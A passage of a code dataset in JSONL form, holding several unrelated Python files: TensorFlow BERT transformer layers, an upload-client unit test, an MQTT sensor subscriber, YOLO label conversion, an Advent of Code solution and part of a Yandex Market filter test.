Found `None`.\")\n self.last_dim = tf.compat.dimension_value(input_shape[-1])\n self.input_spec = tf.keras.layers.InputSpec(\n min_ndim=3, axes={-1: self.last_dim})\n # Determines variable shapes.\n if self.backward_compatible:\n kernel_shape = self.compatible_kernel_shape\n bias_shape = self.compatible_bias_shape\n else:\n kernel_shape = self.kernel_shape\n bias_shape = self.bias_shape\n\n self.kernel = self.add_weight(\n \"kernel\",\n shape=kernel_shape,\n initializer=self.kernel_initializer,\n dtype=self.dtype,\n trainable=True)\n if self.use_bias:\n self.bias = self.add_weight(\n \"bias\",\n shape=bias_shape,\n initializer=self.bias_initializer,\n dtype=self.dtype,\n trainable=True)\n else:\n self.bias = None\n super(Dense3D, self).build(input_shape)\n\n def call(self, inputs):\n if self.backward_compatible:\n kernel = tf.keras.backend.reshape(self.kernel, self.kernel_shape)\n bias = (tf.keras.backend.reshape(self.bias, self.bias_shape)\n if self.use_bias else None)\n else:\n kernel = self.kernel\n bias = self.bias\n\n if self.output_projection:\n ret = tf.einsum(\"abcd,cde->abe\", inputs, kernel)\n else:\n ret = tf.einsum(\"abc,cde->abde\", inputs, kernel)\n if self.use_bias:\n ret += bias\n if self.activation is not None:\n return self.activation(ret)\n return ret\n\n\nclass Dense2DProjection(tf.keras.layers.Layer):\n\n def __init__(self,\n output_size,\n kernel_initializer=None,\n bias_initializer=\"zeros\",\n activation=None,\n fp32_activation=False,\n **kwargs):\n super(Dense2DProjection, self).__init__(**kwargs)\n self.output_size = output_size\n self.kernel_initializer = kernel_initializer\n self.bias_initializer = bias_initializer\n self.activation = activation\n self.fp32_activation = fp32_activation\n\n def build(self, input_shape):\n \"\"\"Implements build() for the layer.\"\"\"\n dtype = tf.as_dtype(self.dtype or tf.keras.backend.floatx())\n if not (dtype.is_floating or dtype.is_complex):\n raise TypeError(\"Unable to build `Dense2DProjection` layer with \"\n \"non-floating point (and non-complex) \"\n \"dtype %s\" % (dtype,))\n input_shape = tf.TensorShape(input_shape)\n if tf.compat.dimension_value(input_shape[-1]) is None:\n raise ValueError(\"The last dimension of the inputs to \"\n \"`Dense2DProjection` should be defined. 
\"\n \"Found `None`.\")\n last_dim = tf.compat.dimension_value(input_shape[-1])\n self.input_spec = tf.keras.layers.InputSpec(min_ndim=3, axes={-1: last_dim})\n self.kernel = self.add_weight(\n \"kernel\",\n shape=[last_dim, self.output_size],\n initializer=self.kernel_initializer,\n dtype=self.dtype,\n trainable=True)\n self.bias = self.add_weight(\n \"bias\",\n shape=[self.output_size],\n initializer=self.bias_initializer,\n dtype=self.dtype,\n trainable=True)\n super(Dense2DProjection, self).build(input_shape)\n\n def call(self, inputs):\n ret = tf.einsum(\"abc,cd->abd\", inputs, self.kernel)\n ret += self.bias\n if self.activation is not None:\n if self.dtype == tf.float16 and self.fp32_activation:\n ret = tf.cast(ret, tf.float32)\n return self.activation(ret)\n return ret\n\n\nclass TransformerBlock(tf.keras.layers.Layer):\n def __init__(self,\n hidden_size=768,\n num_attention_heads=12,\n intermediate_size=3072,\n intermediate_activation=\"gelu\",\n hidden_dropout_prob=0.0,\n attention_probs_dropout_prob=0.0,\n initializer_range=0.02,\n backward_compatible=False,\n float_type=tf.float32,\n **kwargs):\n super(TransformerBlock, self).__init__(**kwargs)\n self.hidden_size = hidden_size\n self.num_attention_heads = num_attention_heads\n self.intermediate_size = intermediate_size\n self.intermediate_activation = tf_utils.get_activation(\n intermediate_activation)\n self.hidden_dropout_prob = hidden_dropout_prob\n self.attention_probs_dropout_prob = attention_probs_dropout_prob\n self.initializer_range = initializer_range\n self.backward_compatible = backward_compatible\n self.float_type = float_type\n\n if self.hidden_size % self.num_attention_heads != 0:\n raise ValueError(\n \"The hidden size (%d) is not a multiple of the number of attention \"\n \"heads (%d)\" % (self.hidden_size, self.num_attention_heads))\n self.attention_head_size = int(self.hidden_size / self.num_attention_heads)\n\n def build(self, unused_input_shapes):\n \"\"\"Implements build() for the layer.\"\"\"\n self.attention_layer = Attention(\n num_attention_heads=self.num_attention_heads,\n size_per_head=self.attention_head_size,\n attention_probs_dropout_prob=self.attention_probs_dropout_prob,\n initializer_range=self.initializer_range,\n backward_compatible=self.backward_compatible,\n name=\"self_attention\")\n self.attention_output_dense = Dense3D(\n num_attention_heads=self.num_attention_heads,\n size_per_head=int(self.hidden_size / self.num_attention_heads),\n kernel_initializer=get_initializer(self.initializer_range),\n output_projection=True,\n backward_compatible=self.backward_compatible,\n name=\"self_attention_output\")\n self.attention_dropout = tf.keras.layers.Dropout(\n rate=self.hidden_dropout_prob)\n self.attention_layer_norm = (\n tf.keras.layers.LayerNormalization(\n name=\"self_attention_layer_norm\", axis=-1, epsilon=1e-12,\n # We do layer norm in float32 for numeric stability.\n dtype=tf.float32))\n self.intermediate_dense = Dense2DProjection(\n output_size=self.intermediate_size,\n kernel_initializer=get_initializer(self.initializer_range),\n activation=self.intermediate_activation,\n # Uses float32 so that gelu activation is done in float32.\n fp32_activation=True,\n name=\"intermediate\")\n self.output_dense = Dense2DProjection(\n output_size=self.hidden_size,\n kernel_initializer=get_initializer(self.initializer_range),\n name=\"output\")\n self.output_dropout = tf.keras.layers.Dropout(rate=self.hidden_dropout_prob)\n self.output_layer_norm = tf.keras.layers.LayerNormalization(\n 
name=\"output_layer_norm\", axis=-1, epsilon=1e-12, dtype=tf.float32)\n super(TransformerBlock, self).build(unused_input_shapes)\n\n def common_layers(self):\n \"\"\"Explicitly gets all layer objects inside a Transformer encoder block.\"\"\"\n return [\n self.attention_layer, self.attention_output_dense,\n self.attention_dropout, self.attention_layer_norm,\n self.intermediate_dense, self.output_dense, self.output_dropout,\n self.output_layer_norm\n ]\n\n def __call__(self, input_tensor, attention_mask=None, **kwargs):\n inputs = tf_utils.pack_inputs([input_tensor, attention_mask])\n return super(TransformerBlock, self).__call__(inputs, **kwargs)\n\n def call(self, inputs, **kwargs):\n \"\"\"Implements call() for the layer.\"\"\"\n (input_tensor, attention_mask) = tf_utils.unpack_inputs(inputs)\n attention_output = self.attention_layer(\n from_tensor=input_tensor,\n to_tensor=input_tensor,\n attention_mask=attention_mask,**kwargs)\n attention_output = self.attention_output_dense(attention_output)\n attention_output = self.attention_dropout(attention_output,training=kwargs.get('training', False))\n # Use float32 in keras layer norm and the gelu activation in the\n # intermediate dense layer for numeric stability\n attention_output = self.attention_layer_norm(input_tensor +\n attention_output)\n if self.float_type == tf.float16:\n attention_output = tf.cast(attention_output, tf.float16)\n intermediate_output = self.intermediate_dense(attention_output)\n if self.float_type == tf.float16:\n intermediate_output = tf.cast(intermediate_output, tf.float16)\n layer_output = self.output_dense(intermediate_output)\n layer_output = self.output_dropout(layer_output,training=kwargs.get('training', False))\n # Use float32 in keras layer norm for numeric stability\n layer_output = self.output_layer_norm(layer_output + attention_output)\n if self.float_type == tf.float16:\n layer_output = tf.cast(layer_output, tf.float16)\n return layer_output\n\n\nclass Transformer(tf.keras.layers.Layer):\n\n def __init__(self,\n num_hidden_layers=12,\n hidden_size=768,\n num_attention_heads=12,\n intermediate_size=3072,\n intermediate_activation=\"gelu\",\n hidden_dropout_prob=0.0,\n attention_probs_dropout_prob=0.0,\n initializer_range=0.02,\n backward_compatible=False,\n float_type=tf.float32,\n **kwargs):\n super(Transformer, self).__init__(**kwargs)\n self.num_hidden_layers = num_hidden_layers\n self.hidden_size = hidden_size\n self.num_attention_heads = num_attention_heads\n self.intermediate_size = intermediate_size\n self.intermediate_activation = tf_utils.get_activation(\n intermediate_activation)\n self.hidden_dropout_prob = hidden_dropout_prob\n self.attention_probs_dropout_prob = attention_probs_dropout_prob\n self.initializer_range = initializer_range\n self.backward_compatible = backward_compatible\n self.float_type = float_type\n\n def build(self, unused_input_shapes):\n \"\"\"Implements build() for the layer.\"\"\"\n self.layers = []\n for i in range(self.num_hidden_layers):\n self.layers.append(\n TransformerBlock(\n hidden_size=self.hidden_size,\n num_attention_heads=self.num_attention_heads,\n intermediate_size=self.intermediate_size,\n intermediate_activation=self.intermediate_activation,\n hidden_dropout_prob=self.hidden_dropout_prob,\n attention_probs_dropout_prob=self.attention_probs_dropout_prob,\n initializer_range=self.initializer_range,\n backward_compatible=self.backward_compatible,\n float_type=self.float_type,\n name=(\"layer_%d\" % i)))\n super(Transformer, 
self).build(unused_input_shapes)\n\n def __call__(self, input_tensor, attention_mask=None, **kwargs):\n inputs = tf_utils.pack_inputs([input_tensor, attention_mask])\n return super(Transformer, self).__call__(inputs=inputs, **kwargs)\n\n def call(self, inputs, return_all_layers=False, **kwargs):\n unpacked_inputs = tf_utils.unpack_inputs(inputs)\n input_tensor = unpacked_inputs[0]\n attention_mask = unpacked_inputs[1]\n output_tensor = input_tensor\n\n all_layer_outputs = []\n for layer in self.layers:\n output_tensor = layer(output_tensor, attention_mask,**kwargs)\n all_layer_outputs.append(output_tensor)\n\n if return_all_layers:\n return all_layer_outputs\n\n return all_layer_outputs[-1]\n\n\ndef get_initializer(initializer_range=0.02):\n return tf.keras.initializers.TruncatedNormal(stddev=initializer_range)\n\n\ndef create_attention_mask_from_input_mask(from_tensor, to_mask):\n from_shape = tf_utils.get_shape_list(from_tensor, expected_rank=[2, 3])\n batch_size = from_shape[0]\n from_seq_length = from_shape[1]\n\n to_shape = tf_utils.get_shape_list(to_mask, expected_rank=2)\n to_seq_length = to_shape[1]\n\n to_mask = tf.cast(\n tf.reshape(to_mask, [batch_size, 1, to_seq_length]),\n dtype=from_tensor.dtype)\n\n broadcast_ones = tf.ones(\n shape=[batch_size, from_seq_length, 1], dtype=from_tensor.dtype)\n\n mask = broadcast_ones * to_mask\n\n return mask\n","repo_name":"imgcook/pipcook-plugin-tensorflow-bert-ner-model","sub_path":"bert_ner_define/bert_modeling.py","file_name":"bert_modeling.py","file_ext":"py","file_size_in_byte":27334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"52378809","text":"from unittest.mock import patch\n\nfrom search.metrics.ccc.ccc_lib.dt_client import DTClient\nfrom search.metrics.ccc.ccc_lib.ccc import CCC\nfrom search.metrics.ccc.ccc_lib.model import CompareTwoRequest\nfrom search.metrics.ccc.ccc_lib.calculators.diff_calculator import DiffResult\n\n\ndef test_upload():\n with patch(\"yt.wrapper.insert_rows\") as yt_mock:\n observation = CCC.create_observation(\n CompareTwoRequest(\n left_serpset_id=-1,\n right_serpset_id=-2,\n left_metric_name=\"onlySearchResult.judged-pfound\",\n right_metric_name=\"onlySearchResult.judged-pfound\",\n type=\"intersected\",\n ),\n DiffResult(\"intersected\", True, None, 1, 1, 1, 11, 1, 1, 1, 0.5),\n )\n tables = {\n DTClient.SERPSET_QUERIES_TABLE: \"//home/metrics/ytcompare/develop/serpset_queries\",\n DTClient.SERP_METRICS_TABLE: \"//home/metrics/ytcompare/develop/serp_query_metrics\",\n DTClient.OBSERVATIONS_TABLE: \"//home/metrics/ytcompare/develop/observations\",\n }\n DTClient(tables, yt_token=\"meow-meow\").upload_observation(observation)\n assert yt_mock.call_count == 1\n first_call = yt_mock.call_args_list[0]\n assert first_call[0][0] == \"//home/metrics/ytcompare/develop/observations\"\n assert first_call[0][1] == [observation]\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"Search engine/tests/dt_client_tests.py","file_name":"dt_client_tests.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28633107041","text":"\r\nfrom paho.mqtt.client import Client\r\n\r\nTEMP_TOPIC = \"temperature\"\r\nHUMIDITY_TOPIC = \"humidity\"\r\n\r\ndef on_message(mqttc, data, msg):\r\n print(f\"Received message: {msg.topic}:{msg.payload}:{data}\")\r\n if data[\"status\"] == 0:\r\n temp = int(msg.payload) \r\n if temp > data[\"temp_threshold\"]:\r\n 
print(f\"Temperature threshold exceeded ({temp}), subscribing to humidity topic\")\r\n mqttc.subscribe(HUMIDITY_TOPIC)\r\n data[\"status\"] = 1\r\n elif data[\"status\"] == 1:\r\n if msg.topic == HUMIDITY_TOPIC:\r\n humidity = int(msg.payload)\r\n if humidity > data[\"humidity_threshold\"]:\r\n print(f\"Humidity threshold exceeded ({humidity}), cancelling subscription to humidity topic\")\r\n mqttc.unsubscribe(HUMIDITY_TOPIC) \r\n data[\"status\"] = 0\r\n elif TEMP_TOPIC in msg.topic:\r\n temp = int(msg.payload)\r\n if temp <= data[\"temp_threshold\"]:\r\n print(f\"Temperature ({temp}) is below the threshold, cancelling subscription to humidity topic\")\r\n data[\"status\"] = 0\r\n mqttc.unsubscribe(HUMIDITY_TOPIC)\r\n \r\ndef on_log(mqttc, data, level, buf):\r\n print(f\"LOG: {data}:{buf}\")\r\n \r\ndef main(broker):\r\n data = {\"temp_threshold\": 20,\r\n \"humidity_threshold\": 80,\r\n \"status\": 0}\r\n mqttc = Client(userdata=data)\r\n mqttc.on_message = on_message\r\n mqttc.enable_logger()\r\n mqttc.connect(broker)\r\n mqttc.subscribe(f\"{TEMP_TOPIC}/t1\")\r\n mqttc.loop_forever()\r\n \r\nif __name__ == \"__main__\":\r\n import sys\r\n if len(sys.argv) < 2:\r\n print(f\"Usage: {sys.argv[0]} broker\")\r\n sys.exit(1)\r\n broker = sys.argv[1]\r\n main(broker)","repo_name":"jamart25/mqtt","sub_path":"Temperature_Humidity.py","file_name":"Temperature_Humidity.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22128063046","text":"from tkinter import *\nroot=Tk()\nroot.title(\"subhadeep chell\")\nroot.geometry(\"664x434\")\nroot.minsize(200,100)\nroot.maxsize(1200,988)\nx=Label(text=\"my name is subhadeep chell\")\nx.pack()\nx=Label(text=\"i read in class XII\")\nx.pack()\nx=Label(text=\"bhojpuri classics\")\nx.pack()\nroot.mainloop()\n","repo_name":"SHERLOCKx90/Python-Programming","sub_path":"tkinter.py","file_name":"tkinter.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39069521645","text":"import os\nimport cv2\n\nyolo_txt = r\"/home/os/window_share/ganhaiyang/Alg_Proj/Detect_Proj/yolov3/runs/detect/exp26/labels\"\n\noutput_path = r\"/home/os/window_share/ganhaiyang/Alg_Proj/2.2.0_20201117_042200/QK_AI_Train_performance/test_tool/coco/norm_hand_labels\"\nos.makedirs(output_path, exist_ok=True)\nimage_path = r\"/home/os/window_share/ganhaiyang/Alg_Proj/Detect_Proj/yolov3/data/val/val_2017coco\"\n\nyolo_list = os.listdir(yolo_txt)\n\n# class_name = [\"person\",\"ele_cap\",\"protection_shoes\", \"shoes\"]\nclass_name = [ 'person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus', 'train', 'truck', 'boat', 'trafficlight',\n 'firehydrant', 'stopsign', 'parkingmeter', 'bench', 'bird', 'cat', 'dog', 'horse', 'sheep', 'cow',\n 'elephant', 'bear', 'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie', 'suitcase', 'frisbee',\n 'skis', 'snowboard', 'sportsball', 'kite', 'baseballbat', 'baseballglove', 'skateboard', 'surfboard',\n 'tennisracket', 'bottle', 'wineglass', 'cup', 'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',\n 'sandwich', 'orange', 'broccoli', 'carrot', 'hotdog', 'pizza', 'donut', 'cake', 'chair', 'couch',\n 'pottedplant', 'bed', 'diningtable', 'toilet', 'tv', 'laptop', 'mouse', 'remote', 'keyboard', 'cellphone',\n 'microwave', 'oven', 'toaster', 'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors', 'teddybear',\n 'hairdrier', 'toothbrush' ]\n\nfor txt 
in yolo_list:\n txt_path = os.path.join(yolo_txt,txt)\n output_txt_path = os.path.join(output_path,txt)\n image_read_path = os.path.join(image_path,txt.split(\".txt\")[0]+\".jpg\") #.png\n\n read_handle = open(txt_path,\"r\")\n write_handle = open(output_txt_path,\"w\")\n\n if os.path.exists(image_read_path):\n pass\n else:\n image_read_path = image_read_path.replace(\".jpg\",\".png\")\n print(image_read_path)\n h,w,_ = cv2.imread(image_read_path).shape\n for content in read_handle:\n if \"\\t\" in content:\n content = content.replace(\"\\t\",\" \")\n content_list = content.split(\" \")\n # print()\n dw = 1. / w\n dh = 1. / h\n # name = class_name[int(content_list[0])]\n\n # ## xyxy -> yolo normal(xywh)\n # name = int(content_list[0])\n name = 1\n # center_x = float(int(content_list[1]) + int(content_list[3]))*dw/2\n # center_y = float(int(content_list[2]) + int(content_list[4]))*dh/2\n # box_w = float(abs(int(content_list[3]) - int(content_list[1])))*dw\n # box_h = float(abs(int(content_list[4]) - int(content_list[2])))*dh\n center_x = float(int(content_list[3]) + int(content_list[5]))*dw/2\n center_y = float(int(content_list[4]) + int(content_list[6]))*dh/2\n box_w = float(abs(int(content_list[5]) - int(content_list[3])))*dw\n box_h = float(abs(int(content_list[6]) - int(content_list[4])))*dh\n\n # top_x = float(int(content_list[1]))*w - float(int(content_list[3]))*w/2\n # top_y = float(int(content_list[2]))*h - float(int(content_list[4][:-3]))*h/2\n # bot_x = float(int(content_list[1]))*w + float(int(content_list[3]))*w/2\n # bot_y = float(int(content_list[2]))*h + float(int(content_list[4][:-3]))*h/2\n\n # yolo normal(xywh) -> xyxy\n # bbox_width = float(content_list[3]) * w\n # bbox_height = float(content_list[4]) * h\n # center_x = float(content_list[1]) * w\n # center_y = float(content_list[2]) * h\n # top_x = center_x - (bbox_width / 2)\n # top_y = center_y - (bbox_height / 2)\n # bot_x = center_x + (bbox_width / 2)\n # bot_y = center_y + (bbox_height / 2)\n\n write_handle.write(str(name) +\" \"+str(center_x)+\" \"+str(center_y)+\" \"+str(box_w)+\" \"+str(box_h)+\"\\n\")\n # write_handle.write(name+\" \"+str(int(top_x))+\" \"+str(int(top_y))+\" \"+str(int(bot_x))+\" \"+str(int(bot_y))+\"\\n\")\n read_handle.close()\n write_handle.close()","repo_name":"Morgan-Gan/Get_datasets","sub_path":"yolo2gt.py","file_name":"yolo2gt.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"39257996312","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nmax_correctness = 0.6\n# Calculate for what sequence length 99% of random sequences have correctness under max_correctness\ndef calc_deviation(n):\n return 1 / (2 * np.sqrt(n))\n\ndef calc_percent(n):\n dev = calc_deviation(n)\n f = lambda x: (1 / (dev * np.sqrt(2 * np.pi))) * np.exp((-1/2) * ((x - 0.5) / dev)**2)\n x = np.linspace(0,max_correctness,1000)\n return (np.trapz(f(x), x)) * 100\n\nx = []\ny = []\nfound = False\nfor i in range(1,300):\n x.append(i)\n y.append(calc_percent(i))\n if not found and y[-1] >= 99:\n found = True\n print(\"Smallest length where 99% of sequences have correctness under \" + str(max_correctness * 100) + \"%: \" + str(x[-1]))\n \nplt.plot(x, y)\nplt.ylabel('Proportion (%) of random sequences with correctness under ' + str(max_correctness * 100) + 
'%')\nplt.xlabel('Sequence length')\nplt.show()","repo_name":"AliceC-7504/0_eller_1","sub_path":"normal_distr.py","file_name":"normal_distr.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"512627049","text":"from collections import defaultdict\n\nfrom days import AOCDay, day\n\n\n@day(5)\nclass Day5(AOCDay):\n print_debug = \"c12\"\n test_input = \"\"\"0,9 -> 5,9\n8,0 -> 0,8\n9,4 -> 3,4\n2,2 -> 2,1\n7,0 -> 7,4\n6,4 -> 2,0\n0,9 -> 2,9\n3,4 -> 1,4\n0,0 -> 8,8\n5,5 -> 8,2\"\"\".split(\"\\n\")\n lines = []\n grid = defaultdict(int)\n\n def common(self, input_data):\n self.lines = []\n self.grid = defaultdict(int)\n for line in input_data:\n line = line.split(\" -> \")\n start = list(map(int, line[0].split(\",\")))\n end = list(map(int, line[1].split(\",\")))\n self.lines.append((start, end))\n\n def print_grid(self, size=10):\n for y in range(size):\n for x in range(size):\n print(self.grid[(x, y)] if self.grid[(x, y)] != 0 else \".\", end=\"\")\n print(\"\")\n\n def part1(self, input_data):\n # Only consider vertical/horizontal lines\n self.lines = list(filter(lambda x: x[0][0] == x[1][0] or x[0][1] == x[1][1], self.lines))\n for start, end in self.lines:\n # Vertical lines\n if start[0] == end[0]:\n order = sorted([start[1], end[1]])\n for i in range(order[0], order[1] + 1):\n self.grid[(start[0], i)] += 1\n # Horizontal lines\n elif start[1] == end[1]:\n order = sorted([start[0], end[0]])\n for i in range(order[0], order[1] + 1):\n self.grid[(i, start[1])] += 1\n yield len([x for x in self.grid.values() if x > 1])\n\n def part2(self, input_data):\n for start, end in self.lines:\n # Vertical lines\n if start[0] == end[0]:\n order = sorted([start[1], end[1]])\n for i in range(order[0], order[1] + 1):\n self.grid[(start[0], i)] += 1\n # Horizontal lines\n elif start[1] == end[1]:\n order = sorted([start[0], end[0]])\n for i in range(order[0], order[1] + 1):\n self.grid[(i, start[1])] += 1\n # Diagonal lines\n else:\n x = start[0]\n y = start[1]\n self.grid[(x, y)] += 1\n while x != end[0] and y != end[1]:\n if start[0] < end[0]:\n x += 1\n else:\n x -= 1\n if start[1] < end[1]:\n y += 1\n else:\n y -= 1\n self.grid[(x, y)] += 1\n yield len([x for x in self.grid.values() if x > 1])\n","repo_name":"Kurocon/AdventOfCode2021","sub_path":"days/day5.py","file_name":"day5.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"186139059","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport runner  # noqa\n\nfrom core.types import GLParam, GLType, GLValue, Model, Offer, VCluster\nfrom core.testcase import TestCase, main\nfrom core.matcher import Absent\n\n\nclass T(TestCase):\n @classmethod\n def prepare_format(cls):\n \"\"\"\n Создаем один оффер с одним и тем же размером из трех размерных сеток -- итого 3 параметра\n Описываем размеры и размерные сетки\n \"\"\"\n cls.settings.default_search_experiment_flags += ['market_filter_offers_with_model_without_sku=0']\n\n cls.index.gltypes += [\n GLType(\n param_id=201,\n hid=101,\n gltype=GLType.ENUM,\n subtype='size',\n cluster_filter=True,\n unit_param_id=202,\n name='size',\n values=[\n GLValue(value_id=1, text='32', unit_value_id=2),\n GLValue(value_id=2, text='34', unit_value_id=2, filter_value_red=False),\n GLValue(value_id=3, text='L', unit_value_id=1),\n GLValue(value_id=4, text='XL', unit_value_id=1),\n GLValue(value_id=5, text='Tumba', 
unit_value_id=3, filter_value=False),\n GLValue(value_id=6, text='Yumba', unit_value_id=3, filter_value=False),\n GLValue(value_id=7, text='9', unit_value_id=4),\n GLValue(value_id=8, text='9.5', unit_value_id=4),\n ],\n ),\n GLType(\n param_id=202,\n hid=101,\n gltype=GLType.ENUM,\n name='size_units',\n positionless=True,\n values=[\n GLValue(value_id=1, text='INT', filter_value_red=False),\n GLValue(value_id=2, text='RU', default=True),\n GLValue(value_id=3, text='African'),\n GLValue(value_id=4, text='US', default_red=True),\n ],\n ),\n ]\n\n cls.index.offers += [\n Offer(\n title='boots',\n hid=101,\n vclusterid=1000000001,\n glparams=[\n GLParam(param_id=201, value=2),\n GLParam(param_id=201, value=4),\n GLParam(param_id=201, value=6),\n ],\n ),\n ]\n\n cls.index.vclusters += [VCluster(title='boots', hid=101, vclusterid=1000000001)]\n\n def test_format_json(self):\n \"\"\"\n Фиксируем json-формат глобальных и локальных фильтров\n Должен быть такой же, как и при выдаче старых размеров, кроме:\n - в глобальных параметрах отображаются только параметры с флажком filter_value=\"true\" (gl_mbo.pbuf.sn)\n - в локальных параметрах отображаются все параметры (здесь: из сетки African)\n \"\"\"\n expected_global_filters = {\n 'search': {},\n 'filters': [\n {\n 'id': '201',\n 'type': 'enum',\n 'name': 'size',\n 'subType': 'size',\n 'kind': 2,\n 'position': 1,\n 'noffers': 1,\n 'defaultUnit': 'RU',\n 'units': [\n {\n 'values': [{'initialFound': 1, 'unit': 'INT', 'found': 1, 'value': \"XL\", 'id': \"4\"}],\n 'unitId': 'INT',\n 'id': '1',\n },\n {\n 'values': [{'initialFound': 1, 'unit': 'RU', 'found': 1, 'value': '34', 'id': '2'}],\n 'unitId': 'RU',\n 'id': '2',\n },\n ],\n }\n ],\n }\n\n unexpected_unit_filters = {'filters': [{'id': '202'}]}\n\n expected_product_filters = {\n 'entity': 'product',\n 'filters': [\n {\n 'id': '201',\n 'type': 'enum',\n 'name': 'size',\n 'subType': 'size',\n 'kind': 2,\n 'position': 1,\n 'noffers': 1,\n 'defaultUnit': 'RU',\n 'units': [\n {\n 'values': [{'initialFound': 1, 'unit': 'INT', 'found': 1, 'value': \"XL\", 'id': \"4\"}],\n 'unitId': 'INT',\n 'id': '1',\n },\n {\n 'values': [{'initialFound': 1, 'unit': 'RU', 'found': 1, 'value': '34', 'id': '2'}],\n 'unitId': 'RU',\n 'id': '2',\n },\n ],\n }\n ],\n }\n\n expected_offer_filters = {\n 'entity': 'offer',\n 'filters': [\n {\n 'id': '201',\n 'type': 'enum',\n 'name': 'size',\n 'subType': 'size',\n 'kind': 2,\n 'position': 1,\n 'noffers': 1,\n 'defaultUnit': 'RU',\n 'units': [\n {\n 'values': [{'initialFound': 1, 'unit': 'African', 'found': 1, 'value': 'Yumba', 'id': '6'}],\n 'unitId': 'African',\n 'id': '3',\n },\n {\n 'values': [{'initialFound': 1, 'unit': 'INT', 'found': 1, 'value': 'XL', 'id': '4'}],\n 'unitId': 'INT',\n 'id': '1',\n },\n {\n 'values': [{'initialFound': 1, 'unit': 'RU', 'found': 1, 'value': '34', 'id': '2'}],\n 'unitId': 'RU',\n 'id': '2',\n },\n ],\n }\n ],\n }\n\n response = self.report.request_json('place=prime&text=boots&hid=101')\n self.assertFragmentIn(response, expected_global_filters)\n self.assertFragmentIn(response, expected_offer_filters, allow_different_len=False)\n self.assertFragmentIn(response, expected_product_filters, allow_different_len=False)\n\n # проверяем, что параметр сетки не отдается фронту\n self.assertFragmentNotIn(response, unexpected_unit_filters)\n\n response = self.report.request_json('place=productoffers&hid=101&hyperid=1000000001')\n self.assertFragmentIn(response, expected_global_filters)\n self.assertFragmentIn(response, expected_offer_filters, 
allow_different_len=False)\n\n # проверяем, что параметр сетки не отдается фронту\n self.assertFragmentNotIn(response, unexpected_unit_filters)\n\n def test_format_xml(self):\n \"\"\"\n Фиксируем xml-формат глобальных и локальных фильтров\n Должен быть такой же, как и при выдаче старых размеров, кроме:\n - в глобальных параметрах отображаются только параметры с флажком filter_value=\"true\" (gl_mbo.pbuf.sn)\n - в локальных параметрах отображаются все параметры (здесь: из сетки African)\n\n Важно! Для place=visual на текущий момент нельзя протестировать локальные параметры кластера (!), т.к. они\n опираются на региональные статистики по фильтрам, которые не реализованы в лайте и не будут, т.к. place=visual\n умирает. Лишний параметр там появиться не может, т.к. там рисуется то, что есть в статистике.\n \"\"\"\n expected_global_filters = '''\n \n \n \n \n \n \n '''\n\n _ = ''\n\n _ = '''\n \n \n \n \n \n \n \n \n \n '''\n requests = ['place=modelinfo&hid=101&hyperid=1000000001&rids=0']\n\n for request in requests:\n response = self.report.request_xml(request)\n self.assertFragmentIn(response, expected_global_filters, allow_different_len=False)\n\n self.error_log.ignore(\n \"can not parse yandexmarket cookie's shows on page(bad lexical cast: source type value could not be interpreted as target)\"\n )\n\n @classmethod\n def prepare_value_order(cls):\n \"\"\"\n Создаем гуру-лайт енум параметр, в значениях указываем порядок их отображения на фронте\n (диапазон может быть не непрерывным)\n Создаем другой гуру-лайт енум параметр, в значениях которого указываем порядок, но в последнем значении \"забываем\"\n Создаем сетки: интернациональную, римскую, текстовую\n Создаем оффер с двумя параметрами, описывающими его размер\n Создаем оффер с параметром из текстовой сетки\n \"\"\"\n cls.index.gltypes += [\n GLType(\n param_id=205,\n hid=102,\n gltype=GLType.ENUM,\n subtype='size',\n cluster_filter=True,\n unit_param_id=206,\n name='size',\n values=[\n GLValue(value_id=5, text='XS', unit_value_id=1, position=2),\n GLValue(value_id=6, text='XL', unit_value_id=1, position=6),\n GLValue(value_id=7, text='L', unit_value_id=1, position=4),\n GLValue(value_id=8, text='M', unit_value_id=1, position=3),\n GLValue(value_id=9, text='I', unit_value_id=2, position=1),\n GLValue(value_id=10, text='IC', unit_value_id=2, position=99),\n GLValue(value_id=11, text='V', unit_value_id=2, position=5),\n GLValue(value_id=12, text='C', unit_value_id=2, position=100),\n ],\n ),\n GLType(\n param_id=207,\n hid=102,\n gltype=GLType.ENUM,\n subtype='size',\n cluster_filter=True,\n unit_param_id=206,\n name='text-size',\n values=[\n GLValue(value_id=1, text='aaa', unit_value_id=3, position=4),\n GLValue(value_id=2, text='bbb', unit_value_id=3, position=3),\n GLValue(value_id=3, text='ccc', unit_value_id=3, position=2),\n GLValue(value_id=4, text='ddd', unit_value_id=3, position=None), # position is absent\n ],\n ),\n GLType(\n param_id=206,\n hid=102,\n gltype=GLType.ENUM,\n name='size_units',\n position=None,\n values=[\n GLValue(value_id=1, text='INT'),\n GLValue(value_id=2, text='ROMAN'),\n GLValue(value_id=3, text='TEXT'),\n ],\n ),\n ]\n\n cls.index.offers += [\n Offer(\n title='shoes',\n hid=102,\n hyperid=601,\n glparams=[\n GLParam(param_id=205, value=5),\n GLParam(param_id=205, value=6),\n GLParam(param_id=205, value=7),\n GLParam(param_id=205, value=8),\n GLParam(param_id=205, value=9),\n GLParam(param_id=205, value=10),\n GLParam(param_id=205, value=11),\n GLParam(param_id=205, value=12),\n GLParam(param_id=206, 
